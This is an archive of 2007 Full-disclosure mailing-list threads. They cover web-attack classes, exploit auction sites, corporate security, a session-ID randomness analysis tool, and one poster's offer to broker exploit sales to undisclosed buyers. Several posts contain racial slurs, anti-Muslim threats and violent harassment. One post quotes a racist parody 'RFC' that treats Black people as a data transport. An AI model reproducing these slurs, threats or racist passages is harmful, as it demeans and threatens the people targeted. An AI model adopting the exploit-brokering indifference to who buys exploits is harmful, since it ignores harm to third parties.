 You are right with respect to your RFI comment... But as far as me learning
 anything, don't count on it. I am after all an ignorant jackass remember?
 
 
 On 7/23/07 6:32 PM, Joey Mengele [EMAIL PROTECTED]
 wrote:
 
 But I am right, am I not? Just pointing out what everyone else was
 thinking already :)
 
 Anyway, if you are implying I am immature because of my ad hominem,
 please refer to the following:
 
 http://archives.neohapsis.com/archives/fulldisclosure/2007-01/0380.html
 
 You should have learned from KF by now the infosec mantra
 'live
 by
 the niggerdong, die by the niggerdong'
 
 J
 
 On Mon, 23 Jul 2007 18:17:53 -0400 Simon Smith
 [EMAIL PROTECTED]
 wrote:
 Kid, your posts continue to clearly demonstrate your immaturity.
 
 http://www.security-express.com/archives/fulldisclosure/2007-07/0404.html
 http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0372.html
 http://seclists.org/fulldisclosure/2007/Jul/0369.html
 http://seclists.org/fulldisclosure/2007/Jul/0402.html
 
 It's too bad that you're such a coward man...
 
 
 
 
 On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED] wrote:
 
 Doesn't RFI stand for remote file inclusion you ignorant jackass?
 
 J
 
 On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith [EMAIL PROTECTED] wrote:
 Local and Remote file inclusion, yes, you are actually missing a bunch of
 things.. ;)
 
 
 On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote:
 
 Hi All,
 Just wondered if I am missing anything important. Am planning to give
 talk on web security.
 Is there any other technique other than the following I have to speak
 about ?
 
 1)XSS
 2)CSRF
 3)SQL Injection
 4)AJAX/JSON hijacking
 5)HTTP response splitting
 6)RFI
 7)CRLF
 8)MITM
 
 Thanks
 Deepan
 

[Full-disclosure] The Auction Site made Forbes.

2007-07-09 Thread Simon Smith
Guys,  
Thought you might like to see this:

http://www.forbes.com/home/security/2007/07/06/security-software-hacking-tech-security-cx_ag_0706vulnmarket.html





Re: [Full-disclosure] The Auction Site made Forbes.

2007-07-09 Thread Simon Smith
Hadn't thought about it that way... ;]

Let the fun begin.


On 7/9/07 4:25 PM, [EMAIL PROTECTED] [EMAIL PROTECTED]
wrote:

 On Mon, 09 Jul 2007 15:50:16 EDT, Simon Smith said:
 Guys,  
 Thought you might like to see this:
 
 http://www.forbes.com/home/security/2007/07/06/security-software-hacking-tech-security-cx_ag_0706vulnmarket.html
 
 Just fsck'ing great.  Now we'll have venture capitalists and arbitrage
 specialists and all that ilk wanting a piece of the action.  You thought this
 was all morally murky *before*, you ain't seen nothing yet. :)
 




Re: [Full-disclosure] EXPLOITS FOR SALE (AUCTION SITE)

2007-07-06 Thread Simon Smith
Well, 
Having read what you write, I'd also question the ethics behind such a
business. If you sell your exploits through that site you do not know who
will end up buying the exploits. There is no promise that the exploits will
end up in good hands.


On 7/6/07 2:57 PM, the electric [EMAIL PROTECTED] wrote:

 It didn't take long for the middleman to try to cash in on exploits.  This
 site is selling or trying to sell zero-day and other exploits to anyone
 willing to pay.  However, they are just a FRONT company, a middleman of sorts.
 Why in the hell would anyone use a middleman if they are trying to get top
  for their hack. I DO NOT agree with selling any exploit and I definitely
 believe this is stupid.   But I am sure there are some dumb asses out that
 will use them.  
   
  
   
 http://www.wslabi.com/wabisabilabi/home.do?
 
 

Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)

2007-07-03 Thread Simon Smith
Damn it I hate it when other people are right...


On 7/3/07 2:20 PM, secure poon [EMAIL PROTECTED] wrote:

 Old as in, I heard about it June 21, 2007 when the story surfaced... you are
 now enlightening us a whole week and a half later..
 
 

Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)

2007-07-02 Thread Simon Smith
Oh... And the URL would be helpful. :P

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9025442&source=NLT_VVR&nlid=37

On 7/2/07 7:20 PM, Simon Smith [EMAIL PROTECTED] wrote:

 So they interview a non-technical, non-email using person about a hack on
 the pentagon?
 
 *scratches head*
 
 
 
 SNOsoft Research Team
 http://snosoft.blogspot.com
 
 


Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)

2007-07-02 Thread Simon Smith
Old... As in you have no concept of time because it just came out? Or old..
As in you knew about this before anyone else because you are awesome?


On 7/2/07 10:12 PM, secure poon [EMAIL PROTECTED] wrote:

 old news..
 
 On 7/2/07, Simon Smith [EMAIL PROTECTED] wrote:
 Oh... And the URL would be helpful. :P
 
 http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9025442&source=NLT_VVR&nlid=37
 
 On 7/2/07 7:20 PM, Simon Smith [EMAIL PROTECTED] wrote:
 
  So they interview a non-technical, non-email using person about a hack on
  the pentagon?
 
  *scratches head*
 
 
  
  SNOsoft Research Team
  http://snosoft.blogspot.com
 
 

[Full-disclosure] ElecN

2007-05-11 Thread Simon Smith
Trying to get hold of ElecN... 




Re: [Full-disclosure] A Botted Fortune 500 a Day

2007-04-13 Thread Simon Smith
Just to add my two cents...

The fact is that the cost in damages of a single compromise is usually far
greater than the cost of implementing and maintaining good security. TJX is
a golden example of that.


On 4/13/07 11:05 AM, Jamie Riden [EMAIL PROTECTED] wrote:

 Hi Steven,
 
 I believe security of an organisation is orthogonal to the number of
 employees/users and how savvy they are. It depends more on the will
 and resources to secure the network properly. Two, corporations do
 have many financial incentives to make sure they are secure - if they
 are doing their risk analyses properly, they can see that. So, yes I
 do expect them to fare better - a lot better - than ISPs. More
 comments are in-line.
 
 On 13/04/07, Steven Adair [EMAIL PROTECTED] wrote:
 On 13/04/07, Steven Adair [EMAIL PROTECTED] wrote:
 Is this in any way surprising?  I think we all know the answer is no.  Many
 Fortune 500 companies have more employees than some ISPs have customers.
 Should we really expect differently?
 
 Yes! Off the top of my head:
 
 1. Corporations should have more of an economic incentive to prevent
 compromises on their internal networks. E.g. TJX breach could cost
 company $1B -
 http://weblog.infoworld.com/zeroday/archives/2007/04/tjx_breach_coul.html
 Now, a typical spambot will cost almost nothing compared with that,
 but the point is you don't know the extent of the compromise until
 you've examined the machines involved.
 
 
 You list incentives but this doesn't mean I should really expect any
 differently.  You are also equating a compromise into TJ MAXX servers for
 which details have not been given.  I doubt and hope the same user that's
 an account for TJ MAXX and using e-mail isn't connected or able to get to
 a server that processes credit card transactions.
 
 A compromise is a compromise and you don't know the extent until
 you've looked at everything. If one of your machines is spewing spam,
 how do you know it is also not leaking confidential data to a third
 party? Any compromise has the potential to be *extremely* costly.
 
 2. Corporations have a lot more influence over their employee's
 behaviour than ISPs do over their customers. Customers can walk away
 to a new ISP with minimal fuss if sanctions are threatened.
 
 Well this is true but you seem to be missing the point of the comparison.
 These are large corporations with tens of thousands (some more, some less)
 that are geographically dispersed across the countries.  This isn't a
 small shop of 50 elite IT users.  This is probably like most other places
 where 90% of the users can barely use Microsoft Word and Excel.  Once
 again.. do I expect differently? No.
 
 There is no reason for an admin to let users compromise the company's
 security. If the company cares about security, they can disable admin
 rights, lock down the firewall and run an IDS.
 
 I can buy the argument that most companies don't care sufficiently,
 but this is really orthogonal to the number and experience level of
 their users.
 
 3. Corporations can lock down their firewalls a lot tighter than ISPs
 can. If my ISP blocked the way my employer does, I would be looking
 for a new ISP.
 
 
 Sure they can in some instances.  How would locking down a firewall stop
 this e-mail from going out?  Maybe you can lock down SPAM firewalls but
 that doesn't stop the root cause.  You have 100,000 users at a Fortune 500
 company with admin access to their Windows laptops.  Are you going to
 block them from using the Internet and using e-mail?  If not I am going to
 continue to expect them to keep getting infected.
 
 Block the infection vectors: screen email, http and ftp traffic. No
 personal laptops on company networks. No admin rights as far as
 possible. Monitor and react to new vectors and threats as they arise.
 
 Yes, I would disable people's Internet access - in fact all intranet
 access too. My main interaction with Cisco kit to date is shutting
 down Ethernet ports and re-enabling them after the problem has been
 resolved. If there's an incident, the plug gets pulled until someone
 has examined the machine, and if necessary reinstalled from known good
 media.
 
 4. ISPs don't own the data on their customer's computers. Corps very
 much do own most of the data on their employees computers. Therefore
 they need to worry about confidentiality in a way that ISPs do not.
 
 
 Well usually corporations not only own the data on the machines, they own
 the computers themselves as well.  You are equating a need and want for
 protection with what would really be expected.
 
 They have a financial incentive to look after their machines, so I do
 expect them to look after them. An ISP has no such incentive to look
 after their customer's machines.
 
 I used to look after security at a large-ish university and odd
 activity would stand out because there the baseline was largely
 'normal' traffic. ISPs have little chance to detect 'odd' behaviour
 because everyone is doing 'odd' 

Re: [Full-disclosure] Why Microsoft should make windows open source

2007-04-04 Thread Simon Smith
I think that anyone who thinks that Microsoft is near an end is being
unrealistic. I think that they are going to have to contend with the
challenges imposed by open source operating systems and OSX, but they are a
software giant. Also remember, Windows is not the only thing that Microsoft
makes. They have their hands in a lot of different pots.



On 4/4/07 11:23 AM, Troy Cregger [EMAIL PROTECTED] wrote:

 
 M$ will never let us h4x0rz into their source (willingly) but I agree
 with you James, the open source paradigm has regularly outpaced M$ and
 many other large corporate software producers where it comes to
 addressing bugs, security holes, and in many cases feature requests.
 
 I don't think too many people will agree with me on this but my feeling
 (call it a hunch) has been that vista will be the beginning of the end
 for M$. Already more and more average users (like my dad who knows
 jack about computers) are installing, using, and liking Linux.
 
 I guess time will tell. As to this patch, or the time M$ takes to
 release any patch... the word that comes to mind here is typical.
 After all, what can you expect from a company that is commonly referred
 to as Micro$loth.
 
 - -tlc
 
 
 James Matthews wrote:
 Hi Everyone
 
 (This can also be an open letter to Microsoft)
 
 Recently I have seen a blog post of Microsoft's security team!  What I
 have found disturbs me even more than when we find these 0days! This is
 what they write!
 
 I'm sure one question in people's minds is how we're able to release an
 update for this issue so quickly. I mentioned on Friday
 http://blogs.technet.com/msrc/archive/2007/03/30/update-on-microsoft-security-advisory-935423.aspx#Vulnerability
 that this issue was first brought to us in late December 2006 and we've
 been working on our investigation and a security update since then. This
 update was previously scheduled for release as part of the April monthly
 release on April 10, 2007.
 
 Are you telling me that this hole was around for just about 4 months and
 they did nothing about it? I am not wondering why it took them so long
 to come out with this patch not why they are putting out so early! Also
 when they were told about this vulnerability they should have fixed it
 right away as we have seen with the OpenBSD ICMP IP 6 hole! Core
 security told them about it LESS THAN A WEEK LATER THERE WAS A PATCH.
 
 So we ask why? Why does it take so long to put out a patch?
 
 Due to the increased risk to customers from these latest attacks, we
 were able to expedite our testing to ensure an update is ready for broad
 distribution sooner than April 10.
 
 Really? Then Please explain this paragraph
 
 *Disclaimer: *
 
 The information provided in this advisory is provided as is without
 warranty of any kind. Microsoft disclaims all warranties, either express
 or implied, including the warranties of merchantability and fitness for
 a particular purpose. In no event shall Microsoft Corporation or its
 suppliers be liable for any damages whatsoever including direct,
 indirect, incidental, consequential, loss of business profits or special
 damages, even if Microsoft Corporation or its suppliers have been
 advised of the possibility of such damages. Some states do not allow the
 exclusion or limitation of liability for consequential or incidental
 damages so the foregoing limitation may not apply.
 
 
 Links:
 http://blogs.technet.com/msrc/archive/2007/04/01/latest-on-security-update-for-microsoft-security-advisory-935423.aspx
 http://www.microsoft.com/technet/security/advisory/935423.mspx
 
 
 I can go on and on but you all get the point!
 
 James
 
 -- 
 http://www.goldwatches.com/watches.asp?Brand=39
 http://www.wazoozle.com
 
 
 
 


Re: [Full-disclosure] phishing sites examples source code

2007-02-16 Thread Simon Smith
What kind of research are you doing?


On 2/16/07 9:53 AM, M.B.Jr. [EMAIL PROTECTED] wrote:

 social-engineering-beggars...
 
 On 2/16/07, Andres Riancho [EMAIL PROTECTED] wrote:
 Hi,
 
 For research I'm doing I need a somewhat large (around 100 would be
 nice...) amount of phishing sites' HTML code. I have googled for them but I
 only get a lot of screenshots of those sites, not the actual code. Does anyone
 have an idea of where I could get those sites' HTML?
 
 Cheers,



Re: [Full-disclosure] Pedophiles On YouTube (ringleader Irish282)

2007-02-13 Thread Simon Smith
murdered to death. Isn't that the point of murder? You don't murder
someone to life, or to hospitalization.

The department of redundancy department...

;]

On 2/13/07 10:08 AM, Siim Põder [EMAIL PROTECTED] wrote:

 Yo!
 
 TheGesus wrote:
 On 2/12/07, Nicholas Winn [EMAIL PROTECTED] wrote:
 And I assume you're not full of shit and have proof of this because?
 I think the forward this email to everyone you know line should have
 been enough to set off anyone's bullshit alarm.
 
 No need to worry. Since receiving this e-mail I have murdered irish282
 to death with my bare hands.
 
 Yours truly,
 MC anonymous.
 


Re: [Full-disclosure] New Transport Protocol RFC - Darknet

2007-02-11 Thread Simon Smith
The fact that you actually have the time in your day to write such trash
clearly demonstrates that you have no social life. It must really suck to be
a friendless loser. I truly feel bad for you.


On 2/10/07 3:56 PM, Pedro Martinez
[EMAIL PROTECTED] wrote:

 Darknet is a next generation black-hat data transport
 protocol. This is an RFC Proposal.
 
 
  
 
 
 
 Network Working Group   J. Evers
 Internet-Draft  Bantown Consulting, Inc.
 Intended status: Standards Track   November 2006
 Expires: May 5, 2007
 
 
 A Standard for the Transmission of IP Datagrams Using the Negro
   darknet.txt
 
 Status of this Memo
 
This document is an Internet-Draft and is NOT offered in accordance
with Section 10 of RFC 2026, and the author does not provide the IETF
with any rights other than to publish as an Internet-Draft.
 
Internet-Drafts are working documents of the Internet Engineering
Task Force (IETF), its areas, and its working groups.  Note that
other groups may also distribute working documents as Internet-
Drafts.
 
Internet-Drafts are draft documents valid for a maximum of six months
and may be updated, replaced, or obsoleted by other documents at any
time.  It is inappropriate to use Internet-Drafts as reference
material or to cite them other than as work in progress.
 
The list of current Internet-Drafts can be accessed at
http://www.ietf.org/ietf/1id-abstracts.txt.
 
The list of Internet-Draft Shadow Directories can be accessed at
http://www.ietf.org/shadow.html.
 
This Internet-Draft will expire on May 5, 2007.
 
 
 Abstract
 
This document presents a novel new technique for the transmission of
IP Datagrams using the dark-skinned Negroid race as a physical-layer
transport.
 
 
 Table of Contents
 
1.  Background
2.  Frame Encoding and Transmission
  2.1.  Encryption and Encapsulation
  2.2.  Ready to Send
  2.3.  Transmission
  2.4.  Decoding
3.  Technical Notes
  3.1.  TTL
  3.2.  NAT Traversal
4.  Security Considerations
5.  Normative References
Author's Address
 
 
 1.  Background
 
Since nearly the discovery of the dark-skinned Negroid race [Negro],
the white man has found this race to be incalculably useful in many
commercial endeavors from cotton picking to producing hip and
urban music.  It has come to the attention of the Authors that the
time may be ripe to introduce a viable new system of transmitting
Internet Protocol Datagrams using this hardy and industrious race of
dark-skinned commodity.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 2.  Frame Encoding and Transmission
 
Sending a Datagram using a Negro is a complicated business, and it
may place considerable strain on systems not accustomed to dealing
with large amounts of Negroes, particularly at institutions of higher
education, polite society and Libraries.  There are multiple steps
which must be taken to encode and prepare the Datagram for
transmission, which are as follows.
 
 2.1.  Encryption and Encapsulation
 
Firstly, to prepare the IP Datagram for transmission, it must be
encoded so as to provide end-to-end encryption of the contents of the
data.  To encode the datagram, simply have it bound into a story-
book.  This simple transformation will leave the Negro clueless as to
its contents, and it will be disinclined to scan its pages as Negroes
   

Re: [Full-disclosure] AP report: Hackers attack key Net traffic computers

2007-02-07 Thread Simon Smith
Amen!


On 2/6/07 9:56 PM, James Matthews [EMAIL PROTECTED] wrote:

 Yes they hit the .org servers! Maybe this is a little wake up call for all the
 people that don't put money into computer security!
 
 On 2/6/07, Juha-Matti Laurio  [EMAIL PROTECTED] wrote:
 According to
 http://seattlepi.nwsource.com/business/1700AP_Internet_Attacks.html
 
 Experts said the unusually powerful attacks lasted for hours but passed
 largely unnoticed by most computer users, a testament to the resiliency of
 the Internet. 
 
 Public CERT sources are pointing to this TEAM CYMRU's DNS Name Server Status
 Summary page too:
 http://www.cymru.com/monitoring/dnssumm/index.html
 
 - Juha-Matti
 

Re: [Full-disclosure] PC/Laptop microphones

2007-01-30 Thread Simon Smith
You're still a coward.


On 1/30/07 12:31 PM, [EMAIL PROTECTED] [EMAIL PROTECTED]
wrote:

 
 Please stay on topic.  Your trolling and bad attempts at humor do
 not belong on this list.  We are all professionals here.
 
 Need I cite the list charter?
 
 NIGGERS
 
 On Mon, 29 Jan 2007 23:29:26 -0500 Simon Smith [EMAIL PROTECTED]
 wrote:
 Who's paranoid, I'm not paranoid, stop talking about me!
 
 
 On 1/29/07 11:13 PM, Jim Popovitch [EMAIL PROTECTED] wrote:
 
 On Tue, 2007-01-30 at 03:52 +0100, Tyop? wrote:
 On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote:
 Given recent info about the US
 FBIs capabilities to remotely enable mobile phone microphones
 (presumably via corporate cellular service providers),
 
 Do you have some links on that?
 Paranoia inside :p
 
 ;-) Paranoia is a good characteristic to have.
 
 Here's a few references:
 http://www.google.com/search?hl=en&q=FBI+Mob+microphone
 
 
 
 -Jim P.


Re: [Full-disclosure] PC/Laptop microphones

2007-01-30 Thread Simon Smith
Idiot. ;]


On 1/30/07 1:04 PM, [EMAIL PROTECTED] [EMAIL PROTECTED]
wrote:

 
 YOU AREN'T EVEN AN AMERICAN
 
 MUSLIM TERRORISTS LIKE YOU ARE RESPONSIBLE FOR KILLING A YOUNG MAN
 ON THIS LIST
 
 AT LEAST YOUR KURAN COMES IN TWO-PLY NOW
 
 FUCK YOU TERRORIST I WILL SEND THE KLAN AFTER YOU GET OUT OF MY
 COUNTRY BUT CRASH A PLANE INTO SIMON FIRST
 
 THANKS
 
 
 On Tue, 30 Jan 2007 12:58:06 -0500 [EMAIL PROTECTED] wrote:
 Fuck you facist piece of shit. I hate motherfuckers who hide
 behind hushmail to be bigot racist pieces of shit.
 
 Yet you have nothing contributed to the list ass wipe!
 
 
 On Tuesday, January 30, 2007 11:30 AM, [EMAIL PROTECTED]
 wrote:
 
 Date: Tue, 30 Jan 2007 12:30:38 -0500
 From: [EMAIL PROTECTED]
 To: Simon Smith [EMAIL PROTECTED]
 Subject: Re: [Full-disclosure] PC/Laptop microphones
 
 
 Sounds very technical.
 
 Very advanced analysis, and very good advice.  I assume that this
 could possibly theoretically effect some legacy cellphones too,
 maybe, I think... likely or not?  You tell me.
 
 oh shit i need to get back in character.
 
 NIGGERS
 
 On Mon, 29 Jan 2007 22:02:14 -0500 Simon Smith [EMAIL PROTECTED] wrote:
 Jim,
 In all reality you don't have to be an agent to do this. You could just
 write an exploit that when successfully executed would compromise the target
 and then fetch an application from a remote site. I'm sure that things like
 this have been done in the past. Hell imagine what you could do with a web
 cam! ;]
 
 New telephones are no different I'm sure.
 
 On 1/29/07 9:26 PM, Jim Popovitch [EMAIL PROTECTED] wrote:
 
 I started this discussion elsewhere, but I feel that there is more
 experience and concern here.   When I look at BIOS settings I see config
 options to disable sound cards, USB, CDROM, INTs, etc., but what about
 the PC or laptop microphone?  Does disabling the sound card remove the
 availability of a built-in microphone? What if I want to play mp3s but
 never have the need to use a microphone? Given recent info about the US
 FBIs capabilities to remotely enable mobile phone microphones
 (presumably via corporate cellular service providers), what prevents my
 OS provider (or distribution) and ISP from working on a way to listen in
 on my office or home conversations via the microphone or the built-in
 speakers?  Thoughts?
 
 -Jim P.
 
 
 
 Great Spirits Have Always Encountered Violent Opposition From
 Mediocre Minds - Einstein
 
 So much stupidity in so little brain!


Re: [Full-disclosure] PC/Laptop microphones

2007-01-29 Thread Simon Smith
Jim, 
In all reality you don't have to be an agent  to do this. You could just
write an exploit that when successfully executed would compromise the target
and then fetch an application from a remote site. I'm sure that things like
this have been done in the past. Hell imagine what you could do with a web
cam! ;]

New telephones are no different I'm sure.

On 1/29/07 9:26 PM, Jim Popovitch [EMAIL PROTECTED] wrote:

 I started this discussion elsewhere, but I feel that there is more
 experience and concern here.   When I look at BIOS settings I see config
 options to disable sound cards, USB, CDROM, INTs, etc., but what about
 the PC or laptop microphone?  Does disabling the sound card remove the
 availability of a built-in microphone? What if I want to play mp3s but
 never have the need to use a microphone? Given recent info about the US
 FBIs capabilities to remotely enable mobile phone microphones
 (presumably via corporate cellular service providers), what prevents my
 OS provider (or distribution) and ISP from working on a way to listen in
 on my office or home conversations via the microphone or the built-in
 speakers?  Thoughts?
 
 -Jim P.


Re: [Full-disclosure] PC/Laptop microphones

2007-01-29 Thread Simon Smith
Who's paranoid, I'm not paranoid, stop talking about me!


On 1/29/07 11:13 PM, Jim Popovitch [EMAIL PROTECTED] wrote:

 On Tue, 2007-01-30 at 03:52 +0100, Tyop? wrote:
 On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote:
 Given recent info about the US
 FBIs capabilities to remotely enable mobile phone microphones
 (presumably via corporate cellular service providers),
 
 Do you have some links on that?
 Paranoia inside :p
 
 ;-) Paranoia is a good characteristic to have.
 
 Here's a few references:
 http://www.google.com/search?hl=enq=FBI+Mob+microphone
 
 
 
 -Jim P.


Re: [Full-disclosure] stompy the session stomper - tool availability

2007-01-27 Thread Simon Smith
Very cool.


On 1/27/07 7:29 AM, Michal Zalewski [EMAIL PROTECTED] wrote:

 Hi all,
 
 I'd like to announce the availability of 'stompy', a free tool to perform
 a fairly detailed black-box assessment of WWW session identifier
 generation algorithms. Session IDs are commonly used to track
 authenticated users, and as such, whenever they're predictable or simply
 vulnerable to brute-force attacks, we do have a problem.
 
 [ The reason I'm cc:ing BUGTRAQ is that this tool already revealed several
   new, potential weaknesses in application platforms, and can be readily
   used to find more - for example, it is my impression that BEA WebLogic
   and Sun Java System Web Server both have problems with their JSESSIONIDs
   [1]; proprietary solutions by some of the larger portals / e-commerce
   sites didn't always earn a passing grade, either. ]
 
 Why bother?
 ===
 
 Some session ID cookie generation mechanisms are well-studied and
 well-documented, and believed to be cryptographically secure (example:
 Apache Tomcat, PHP, ASP.NET builtins). This is not necessarily so for
 certain less researched enterprise web platforms - and almost never so for
 custom solutions that are frequently implemented inside the web
 application itself.
 
 Yet, while there are several nice GUI-based tools designed to analyze HTTP
 cookies for common problems (Daves' WebScarab, SPI Cookie Cruncher,
 Foundstone CookieDigger, etc), they all seem to rely on very trivial, if
 any, tests when it comes to unpredictability (alphabet distribution or
 average bits changed are top shelf); this functionality is often not
 better than a quick pen-and-paper analysis, and can't be routinely used to
 tell a highly vulnerable linear congruent PRNG (rand())  from a
 well-implemented MD5 hash system (/dev/urandom).
 
 As far as I can tell, today's super-bored pen-testers can at best collect
 data by hand, determine its encoding, write conversion scripts, and then
 feed it to NIST Statistical Test Suite or alike - but few will.
 
 What's cool?
 
 
 In order to have a fully automated, hands-off tool to reliably detect
 anomalies that are not readily apparent at a first glance, I devised a
 utility that:
 
   - Automatically finds session IDs encoded as URLs, cookies, and
 in form inputs, then collects a statistically significant sample
 of data,
 
   - Determines alphabet structure to transparently handle base64,
 uuencode, base32, hex, and any other sane encoding scheme
 without user intervention,
 
   - Translates the data to isolated time-domain bitstreams to
 examine how SID bits at each position change in time,
 
   - Runs a suite of FIPS-140-2 PRNG evaluation tests on the sample,
 
   - Runs an array of n-dimensional phase space tests to find
 deterministic correlations, PRNG hyperplanes, etc, etc.
 
 Of course, the tool cannot prove the correctness of an implementation, and
 it is possible to devise predictable, cryptographically unsafe PRNGs that
 would pass these tests; still, the tool can find plenty of problems and
 oddities.
 
 Well, that's it. For more, see the included README file. The application,
 in a fairly decent shape (not a wobbly PoC) and tested under Linux,
 FreeBSD, and CYGWIN, can be downloaded here:
 
   http://lcamtuf.coredump.cx/stompy.tgz
 
 Cheers,
 /mz
 
 [1] BEA Weblogic test output: http://lcamtuf.coredump.cx/BEA.log; in
 response to WebScarab analysis, BEA stated some time ago that the
 beginning of the identifier might be deterministic at MSB positions:
 
 http://dev2dev.bea.com/blog/neilsmithline/archive/2006/03/jsessionid_valu_1.html
 ...but 'stompy' output seems to clearly indicate that all the
 data exhibits strong biases, irregularities, and correlation
 patterns, and as such, the randomness of their very large random
 number is questionable at best.
 
 .
 
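The per-position, time-domain analysis from the stompy announcement quoted above, as an added example (not stompy's code and not part of the original post). It assumes hex-encoded 32-bit session IDs; both sample generators are constructed, the function names are hypothetical, and only the monobit, poker and long-run tests are implemented, with the FIPS 140-2 thresholds for a 20,000-bit stream.

```python
import secrets

SAMPLE = 20000  # the FIPS 140-2 tests are defined on a 20,000-bit stream


def lcg_sids(n, seed=2007):
    """Constructed weak generator: 32-bit rand()-style LCG, hex-encoded."""
    state, out = seed, []
    for _ in range(n):
        state = (1664525 * state + 1013904223) % 2**32
        out.append(f"{state:08x}")
    return out


def csprng_sids(n):
    """Constructed reference generator: 32 bits from the OS CSPRNG per SID."""
    return [secrets.token_hex(4) for _ in range(n)]


def bitstreams(sids):
    """One time-domain stream per bit position: streams[k][t] is bit k
    (0 = least significant) of the t-th collected session ID."""
    width = 4 * len(sids[0])
    values = [int(s, 16) for s in sids]
    return [[(v >> k) & 1 for v in values] for k in range(width)]


def monobit(bits):
    # Number of ones must stay close to half of the stream.
    return 9725 < sum(bits) < 10275


def poker(bits):
    # Chi-square style statistic over the 16 possible 4-bit blocks.
    counts = [0] * 16
    for i in range(0, SAMPLE, 4):
        nibble = bits[i] << 3 | bits[i + 1] << 2 | bits[i + 2] << 1 | bits[i + 3]
        counts[nibble] += 1
    x = 16 / 5000 * sum(c * c for c in counts) - 5000
    return 2.16 < x < 46.17


def long_run(bits):
    # No run of identical bits may reach length 26.
    longest = run = 1
    for prev, cur in zip(bits, bits[1:]):
        run = run + 1 if cur == prev else 1
        longest = max(longest, run)
    return longest < 26


TESTS = {"monobit": monobit, "poker": poker, "long_run": long_run}


def failing_positions(sids):
    """Map bit position -> names of the tests its time-domain stream failed."""
    report = {}
    for k, stream in enumerate(bitstreams(sids)):
        failed = [name for name, test in TESTS.items() if not test(stream)]
        if failed:
            report[k] = failed
    return report


if __name__ == "__main__":
    samples = (("LCG", lcg_sids(SAMPLE)), ("CSPRNG", csprng_sids(SAMPLE)))
    for label, sids in samples:
        report = failing_positions(sids)
        print(f"{label}: {len(report)} of 32 bit positions fail")
        for k, failed in sorted(report.items()):
            print(f"  bit {k:2d}: {', '.join(failed)}")
```

The LCG's lowest bits pass the monobit (frequency) test yet fail the poker test, which is the gap between alphabet-distribution checks and the tests the announcement describes.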


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-20 Thread Simon Smith
Mario, 
What Netragard is doing is in fact not nearly as naive as what you are
proposing.  In fact, what Netragard is doing will most probably help "alarm
companies" in the future.

On 1/20/07 7:10 AM, Mario D [EMAIL PROTECTED] wrote:

 So,
  
 Let's say I know how to bypass the alarm to your house.  Should I put it up
 for sale and not worry about who buys it or why because it is none of my
 business?
  
 It's people like you who give the security profession a bad name.
  
 Mario
 
 - Original Message 
 From: Simon Smith [EMAIL PROTECTED]
 To: Roman Medina-Heigl Hernandez [EMAIL PROTECTED]; Untitled
 full-disclosure@lists.grok.org.uk
 Cc: bugtraq@securityfocus.com
 Sent: Thursday, January 18, 2007 2:27:06 PM
 Subject: Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR
 MORE
 
 Oh, 
 About your ROI question, that varies per buyer. I am not usually told
 about why a buyer needs something as that's none of my business.
 
 On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
 wrote:
 
  Simon Smith escribió:
  Amen!
  KF is 100% on the money. I can arrange the legitimate purchase of 
most
  working exploits for significantly more money than iDefense, In some
 cases
  over $75,000.00 per purchase. The company that I am working with has a
  relationship with a legitimate buyer, all transactions are legal. If
 you're
  
  naive
  
  I was wondering which kind of (legal) enterprises/organizations would pay
  $75000 for a simple (or not so simple) exploit.
  - governmental organizations (defense? DoD? FBI? ...)
  - firms offering high-profiled pen-testing services?
  - ... ?
  
  What about the ROI for such investment?
  
  /naive
  
  Regards,
  -Roman
  

Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Roman, 
   It depends on the needs and requirements of the buyer.


On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
wrote:

 Simon Smith escribió:
 Amen!
 KF is 100% on the money. I can arrange the legitimate purchase of most
 working exploits for significantly more money than iDefense, In some cases
 over $75,000.00 per purchase. The company that I am working with has a
 relationship with a legitimate buyer, all transactions are legal. If you're
 
 naive
 
 I was wondering which kind of (legal) enterprises/organizations would pay
 $75000 for a simple (or not so simple) exploit.
 - governmental organizations (defense? DoD? FBI? ...)
 - firms offering high-profiled pen-testing services?
 - ... ?
 
 What about the ROI for such investment?
 
 /naive
 
 Regards,
 -Roman
 


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Oh, 
About your ROI question, that varies per buyer. I am not usually told
about why a buyer needs something as that's none of my business.

On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
wrote:

 Simon Smith escribió:
 Amen!
 KF is 100% on the money. I can arrange the legitimate purchase of most
 working exploits for significantly more money than iDefense, In some cases
 over $75,000.00 per purchase. The company that I am working with has a
 relationship with a legitimate buyer, all transactions are legal. If you're
 
 naive
 
 I was wondering which kind of (legal) enterprises/organizations would pay
 $75000 for a simple (or not so simple) exploit.
 - governmental organizations (defense? DoD? FBI? ...)
 - firms offering high-profiled pen-testing services?
 - ... ?
 
 What about the ROI for such investment?
 
 /naive
 
 Regards,
 -Roman
 


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Just wanted to let everyone know that I've updated the blog to reflect new
changes. You can see the changes at http://snosoft.blogspot.com.


On 1/18/07 2:27 PM, Simon Smith [EMAIL PROTECTED] wrote:

 Oh, 
 About your ROI question, that varies per buyer. I am not usually told
 about why a buyer needs something as that's none of my business.
 
 On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
 wrote:
 
 Simon Smith escribió:
 Amen!
